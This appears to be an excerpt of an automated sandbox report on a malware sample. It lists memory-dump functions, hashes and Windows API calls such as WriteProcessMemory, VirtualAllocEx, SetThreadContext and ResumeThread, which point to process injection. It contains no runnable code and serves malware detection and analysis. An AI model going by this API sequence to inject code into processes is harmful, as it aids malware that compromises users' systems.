                                                                                                              • String ID: Teq
                                                                                                              • API String ID: 0-1098410595
                                                                                                              • Opcode ID: 180cedbd52b69e6a542789e14b653bfcb3c9de94a77dab0bca98b08250d04f94
                                                                                                              • Instruction ID: 75d62ab8ba83ba923216b17e0f928fd80fca834c2d1a629fbaf09794cbd2fdb2
                                                                                                              • Opcode Fuzzy Hash: 180cedbd52b69e6a542789e14b653bfcb3c9de94a77dab0bca98b08250d04f94
                                                                                                              • Instruction Fuzzy Hash: 70128C71B142148BDB04FBB8E489B6D7FB2EF88300F614529E046E37A9DE38E854DB51
                                                                                                              Function 05002690 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 050028E6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1806590670.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_5000000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              • Opcode ID: 65735829796930982824964bd5495e01b5de38e2dbe71ff18b555a58c1775b0f
                                                                                                              • Instruction ID: c8a518ccaa2a17578f311ca19a499b33118dd687a0fc8d4c707b8280bc3bbedc
                                                                                                              • Opcode Fuzzy Hash: 65735829796930982824964bd5495e01b5de38e2dbe71ff18b555a58c1775b0f
                                                                                                              • Instruction Fuzzy Hash: E8716874A00B058FEB64DF2AE5447AABBF1FF88304F10892DD08AD7A90D775E845CB91
                                                                                                              Function 078BE528 Relevance: 1.7, Strings: 1, Instructions: 429COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @
                                                                                                              • API String ID: 0-2766056989
                                                                                                              • Opcode ID: b78102ae983995a8bd7acebc206da14be3c2566d1fbf16db1fd60bb7671701c3
                                                                                                              • Instruction ID: 60c191edf5e1fc33ec7ef737f76bf559c5a8b065e601e5e7d111b5ca66a03015
                                                                                                              • Opcode Fuzzy Hash: b78102ae983995a8bd7acebc206da14be3c2566d1fbf16db1fd60bb7671701c3
                                                                                                              • Instruction Fuzzy Hash: EDE1A371B102108BCB04FBBCE599B6EBFA6AF84340F554629D046E3398DE38ED15C362
                                                                                                              Function 05007F47 Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05008062
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1806590670.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_5000000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 716092398-0
                                                                                                              • Opcode ID: dd9f677475962b88ba7e85ad9113d2af83a3b85de39c7424bcfb311e953d6a13
                                                                                                              • Instruction ID: 5c8eb21f8020d75634884a25805cf977a9255bfba7bba595eba8b88d91d4d688
                                                                                                              • Opcode Fuzzy Hash: dd9f677475962b88ba7e85ad9113d2af83a3b85de39c7424bcfb311e953d6a13
                                                                                                              • Instruction Fuzzy Hash: 2451FDB1D003489FEB14CFA9D884ADEBBB1FF48310F24812AE818AB251D775A845CF91
                                                                                                              Function 05007F50 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05008062
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1806590670.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_5000000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 716092398-0
                                                                                                              • Opcode ID: 34c9de65f5a7ee61a679c3a2941503ea3926a1c7ba4c8684164f05f53fa1ea9e
                                                                                                              • Instruction ID: 61413d55bd3a7194027f010e61bdb3a2ef092a1b6221b2be4f54bbfb1c2d2ba2
                                                                                                              • Opcode Fuzzy Hash: 34c9de65f5a7ee61a679c3a2941503ea3926a1c7ba4c8684164f05f53fa1ea9e
                                                                                                              • Instruction Fuzzy Hash: 9641CEB1D00359DFDB14CFAAD884ADEBBB5BF48310F24812AE819AB250D775A845CF91
                                                                                                              Function 050074D4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 0500A5D1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1806590670.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_5000000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CallProcWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2714655100-0
                                                                                                              • Opcode ID: a10ac92171512e20287f822483d8296fcdab022b7db56726273e4f8523c4b17e
                                                                                                              • Instruction ID: 991d2b5abd6ab15c4fd3bd3e456f3f7f845aa4a0b041448ee795f8635e19a273
                                                                                                              • Opcode Fuzzy Hash: a10ac92171512e20287f822483d8296fcdab022b7db56726273e4f8523c4b17e
                                                                                                              • Instruction Fuzzy Hash: 1E412AB4A00309CFDB14CF9AD488BAEBBF5FB88315F248459D519AB361D774A941CBA0
                                                                                                              Function 076DBDF7 Relevance: 1.6, APIs: 1, Instructions: 77fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • DeleteFileW.KERNELBASE(00000000), ref: 076DBE90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810087104.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_76d0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DeleteFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 4033686569-0
                                                                                                              • Opcode ID: 770c89af896487c5d6e224205df8c0b53fabba8e4b6dd712e7448f8e4fea1910
                                                                                                              • Instruction ID: 22c8d765d2140f3edd5411f7d0b24942422bc2c5d4be803f9b8ae6d9ba4b2a55
                                                                                                              • Opcode Fuzzy Hash: 770c89af896487c5d6e224205df8c0b53fabba8e4b6dd712e7448f8e4fea1910
                                                                                                              • Instruction Fuzzy Hash: 0E219AB2C0066A9FDB14CFAAC840BDEFBB4FF09210F15811AD859A7241D3385944CFA5
                                                                                                              Function 0901E2E8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0901E378
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1811136870.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_9010000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: 1e326a90bdaf0a830dee55db6d28a8c2b1028f2787cd418d38548d3f96e66253
                                                                                                              • Instruction ID: 61b30f5d26388c8d9359f6b7cff18b936512e9473b231d972ff71a0b25a2c7e4
                                                                                                              • Opcode Fuzzy Hash: 1e326a90bdaf0a830dee55db6d28a8c2b1028f2787cd418d38548d3f96e66253
                                                                                                              • Instruction Fuzzy Hash: 70212775D003599FDB10CFAAC884BDEBBF5FF48310F10842AE919A7240D7789940DBA5
                                                                                                              Function 0901EA28 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0901EAA6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1811136870.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_9010000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              • Opcode ID: 5c75fe4cb8519be8f743cfb1decc687e31c1814e845de70067ed0f8515058c89
                                                                                                              • Instruction ID: 9811964fb5ce9d901403c1f3c685630e1e28026dcd403cb42c37d75025589585
                                                                                                              • Opcode Fuzzy Hash: 5c75fe4cb8519be8f743cfb1decc687e31c1814e845de70067ed0f8515058c89
                                                                                                              • Instruction Fuzzy Hash: 3F210771D003098FDB14DFAAC485BAEBBF4BF48214F54842AD859A7640DB78A944CBA5
                                                                                                              Function 0901D8C0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0901D93E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1811136870.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_9010000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              • Opcode ID: 1bbe43f0678ebe305d7bb6979e1735b3b99b20ed30e47a83a5c2e5dbb66d8d35
                                                                                                              • Instruction ID: a3ba332998a41c16905610a24a3039805c8c46ef9b6ba8652a68ff4ade6b5cd8
                                                                                                              • Opcode Fuzzy Hash: 1bbe43f0678ebe305d7bb6979e1735b3b99b20ed30e47a83a5c2e5dbb66d8d35
                                                                                                              • Instruction Fuzzy Hash: 50213571D003098FDB14CFAAC484BEEBBF4AF48224F14842AE459A7280CB789945CFA5
                                                                                                              Function 05003A63 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05003AEF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1806590670.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_5000000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: f5e5b86ccdb37a84ce079dd312d51f00194874dad346e8a91d185128bd109e97
                                                                                                              • Instruction ID: a1a1b90220601cb14cdde39f3cc884b86a5beefa2d68ad2ad7d41b3037e5a45d
                                                                                                              • Opcode Fuzzy Hash: f5e5b86ccdb37a84ce079dd312d51f00194874dad346e8a91d185128bd109e97
                                                                                                              • Instruction Fuzzy Hash: 8621E3B5D002589FDB10CFAAD884ADEBBF4FB48310F14841AE914A3350D378A940CF65
                                                                                                              Function 0798CA0E Relevance: 1.6, APIs: 1, Instructions: 62memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0798CA93
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810753200.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7980000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: c04a3b5c4369d33129871b328284cef855083f50dbeae2f2265a51f2097c46d4
                                                                                                              • Instruction ID: a3dc30e0d944ab3fdb924d8b3cdd3839c091345426ddefd9b1d9a978e1ba12d3
                                                                                                              • Opcode Fuzzy Hash: c04a3b5c4369d33129871b328284cef855083f50dbeae2f2265a51f2097c46d4
                                                                                                              • Instruction Fuzzy Hash: 8A2125B59043599FCB11CFAAC880ADEFFF4AB49310F10846AE458A7251D378AA44CFA1
                                                                                                              Function 05003A68 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05003AEF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1806590670.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_5000000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: 34953309b3373cbd56441ad003fb4d61761043eadd44c3eaa2a6cbabaf321565
                                                                                                              • Instruction ID: 23ab485c0d2a9bd5e0301e36f503b2fefd713f205937c9e79d891d80f7cd76fb
                                                                                                              • Opcode Fuzzy Hash: 34953309b3373cbd56441ad003fb4d61761043eadd44c3eaa2a6cbabaf321565
                                                                                                              • Instruction Fuzzy Hash: 7A21E2B5D002589FDB10CFAAD884ADEFBF8FB48310F14841AE918A3350D378A940CFA5
                                                                                                              Function 0901E788 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 0901E7FF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1811136870.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_9010000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: 1367c1c6b4006908d03492fe9234d55e7381a204391bd16e1fc02abefc291f6d
                                                                                                              • Instruction ID: dd7a7516a6c92521bd3af8ba7ff583769a632526a79bb62bd4ed9f255d46498e
                                                                                                              • Opcode Fuzzy Hash: 1367c1c6b4006908d03492fe9234d55e7381a204391bd16e1fc02abefc291f6d
                                                                                                              • Instruction Fuzzy Hash: 48213772C003098FDB10CFAAC844BEEBBF4BF48320F14842AE819A7240C7799540CFA5
                                                                                                              Function 090146E0 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0901475B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1811136870.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_9010000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: e69cef87c2d940c740e95c3a1cdcc80a785c2dc1b91e38698e4ed3065fa19213
                                                                                                              • Instruction ID: a35214a9292fa48d275a0c80ffef1869a53b55b95cfc0e3517ff36866a3135cb
                                                                                                              • Opcode Fuzzy Hash: e69cef87c2d940c740e95c3a1cdcc80a785c2dc1b91e38698e4ed3065fa19213
                                                                                                              • Instruction Fuzzy Hash: 552106B5D002599FCB20CF9AC484BDEFBF4FB49320F10842AE958A7650D378A544CFA5
                                                                                                              Function 076DBE20 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • DeleteFileW.KERNELBASE(00000000), ref: 076DBE90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810087104.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_76d0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DeleteFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 4033686569-0
                                                                                                              • Opcode ID: 48110efd5fcc41ae9ff9c58eb4e481afb3e6ac43861d65ea79bda4d0e66b8efd
                                                                                                              • Instruction ID: 61cab127d3ba4637633dd0795368a9af8ea9723a3b7c11e5fdfb562316e74f55
                                                                                                              • Opcode Fuzzy Hash: 48110efd5fcc41ae9ff9c58eb4e481afb3e6ac43861d65ea79bda4d0e66b8efd
                                                                                                              • Instruction Fuzzy Hash: C11138B1C0065A9FCB14CF9AC444B9EFBF4BF48310F11811AD819A7740D378A944CFA5
                                                                                                              Function 0798CA20 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0798CA93
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810753200.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7980000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: 033c9b521ad0dad84cdbced2fc30f63e4874e63b561d0167c851fe697a82b5df
                                                                                                              • Instruction ID: e4d4dd6b37738d39ea60200a9e28158e3b4ec4672a5ab7d19ccab848ba6b6839
                                                                                                              • Opcode Fuzzy Hash: 033c9b521ad0dad84cdbced2fc30f63e4874e63b561d0167c851fe697a82b5df
                                                                                                              • Instruction Fuzzy Hash: 672103B5D002599FDB10DF9AC884BDEFBF4FB48320F10842AE858A7250D378A544CFA5
                                                                                                              Function 090146E8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0901475B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1811136870.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_9010000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: ddf0b763c13f977ba85b5d0b469e5386ea79179ae59d8db2a75765d71cbb409a
                                                                                                              • Instruction ID: c4173d943a9a73e46652448449065302a0633aee0d9910b0de17b131b1f15026
                                                                                                              • Opcode Fuzzy Hash: ddf0b763c13f977ba85b5d0b469e5386ea79179ae59d8db2a75765d71cbb409a
                                                                                                              • Instruction Fuzzy Hash: B721E4B5D002599FDB10CF9AC884BDEFBF5FB48320F10842AE968A7650D378A544CFA5
                                                                                                              Function 0901DFA8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0901E016
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1811136870.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_9010000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: 67ae7fe7346e068e5feab4838c0bf9e037f046acb2ef46cff6f0adeaf045dcb8
                                                                                                              • Instruction ID: 9691733b33177c8718e369d86cf71cb4f682cb6be5e41a62750c9e03c6fda966
                                                                                                              • Opcode Fuzzy Hash: 67ae7fe7346e068e5feab4838c0bf9e037f046acb2ef46cff6f0adeaf045dcb8
                                                                                                              • Instruction Fuzzy Hash: 0F112676C003499FDB24DFAAC844BDFBBF5EF48310F14881AE915A7650C779A540CBA5
                                                                                                              Function 0901EC90 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1811136870.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_9010000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 947044025-0
                                                                                                              • Opcode ID: aa601067a9a4e9c17429326aab6fdb2c049f06bf7c2874246eef95d7a3710015
                                                                                                              • Instruction ID: 0efcbf8442d23976300ddb83dc700f9e3e144f915f2d4282de50514f15a1de0c
                                                                                                              • Opcode Fuzzy Hash: aa601067a9a4e9c17429326aab6fdb2c049f06bf7c2874246eef95d7a3710015
                                                                                                              • Instruction Fuzzy Hash: 57113A75D003588FDB24DFAAC8457DFFBF5AF48214F14841AD419A7640CB79A540CBA5
                                                                                                              Function 09014B30 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0901F27D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1811136870.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_9010000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessagePost
                                                                                                              • String ID:
                                                                                                              • API String ID: 410705778-0
                                                                                                              • Opcode ID: a2ca9ae291dc324fac51fab7f505c0660e013a6ddb7f7b2a6aac7acb876533dc
                                                                                                              • Instruction ID: 5b5a08c00f201d02facd262d02a992113aeb0c54d86e72053b4602ae5dac9dfc
                                                                                                              • Opcode Fuzzy Hash: a2ca9ae291dc324fac51fab7f505c0660e013a6ddb7f7b2a6aac7acb876533dc
                                                                                                              • Instruction Fuzzy Hash: 2111F5B58003599FDB20DF9AD445BDEBBF8FB48314F10841AE558A7640C375A944CFA5
                                                                                                              Function 05002880 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 050028E6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1806590670.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_5000000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              • Opcode ID: 43c1710ec3500cc57d347123594ebadcfc400498dab888456b7327e86f2682dc
                                                                                                              • Instruction ID: c585c4e738cab3fda471d6525afd33073956136ccd49ab64ca68c6668e7bc7cd
                                                                                                              • Opcode Fuzzy Hash: 43c1710ec3500cc57d347123594ebadcfc400498dab888456b7327e86f2682dc
                                                                                                              • Instruction Fuzzy Hash: BB110FBAC003498FDB20CF9AD844BDEFBF4FB88210F10842AD419A7650C379A545CFA5
                                                                                                              Function 078BF4A7 Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'q
                                                                                                              • API String ID: 0-1807707664
                                                                                                              • Opcode ID: 57424983ae0bb2aa4c1ccd890dce27c06daf01a4d88ef13bf6c1cb239f74b396
                                                                                                              • Instruction ID: 1c185c27fea76d893bc92b918ee6413e1efc2cafa22842622af4fa459124baab
                                                                                                              • Opcode Fuzzy Hash: 57424983ae0bb2aa4c1ccd890dce27c06daf01a4d88ef13bf6c1cb239f74b396
                                                                                                              • Instruction Fuzzy Hash: 0271F275B14216CFC704EFB9E8856AE7FF2AB89300F4841A9E145D7399DA38DD04C7A1
                                                                                                              Function 010B8BB8 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'q
                                                                                                              • API String ID: 0-1807707664
                                                                                                              • Opcode ID: e7c8af268a4c6bde85515fa7fb199ac1b752d17b7da9423b59d539b34858ade1
                                                                                                              • Instruction ID: 44abb56f9d29966267285fcdd12efe897db3d25a8439c30ce968efc9dfde0313
                                                                                                              • Opcode Fuzzy Hash: e7c8af268a4c6bde85515fa7fb199ac1b752d17b7da9423b59d539b34858ade1
                                                                                                              • Instruction Fuzzy Hash: FE415EB46002189FDB15DF29D898AAE7BB5FB88311F1040A6FA558B371C734DD44CB90
                                                                                                              Function 010BAD78 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (q
                                                                                                              • API String ID: 0-2414175341
                                                                                                              • Opcode ID: 08745ec72d0b32deb7123327bf67600e166329550aa93ec3ec6b2f17fd2a88a3
                                                                                                              • Instruction ID: 4cc484ecf47f70b1e98e9ee34adbbfa773c358f1793a15733ba64e0451bd4573
                                                                                                              • Opcode Fuzzy Hash: 08745ec72d0b32deb7123327bf67600e166329550aa93ec3ec6b2f17fd2a88a3
                                                                                                              • Instruction Fuzzy Hash: 7331BE31E0425A8FDB05DFB994506EEBBF2EF89311F24846AD505FB281EA309D06CB95
                                                                                                              Function 010B8F00 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'q
                                                                                                              • API String ID: 0-1807707664
                                                                                                              • Opcode ID: 2d3db5c735ea1814c924e1981458e82578f1dbaa65cf8b882e7022c7d6ac38e6
                                                                                                              • Instruction ID: b59be0eeb3e488cedcd05718e42aa24e277745d88235307ba60240b0d76b5979
                                                                                                              • Opcode Fuzzy Hash: 2d3db5c735ea1814c924e1981458e82578f1dbaa65cf8b882e7022c7d6ac38e6
                                                                                                              • Instruction Fuzzy Hash: CD21803170415A8BDB14DE2A99C0AFB7BEFEB85210B04C467FB95CB264DB70CD408761
                                                                                                              Function 010B4E40 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
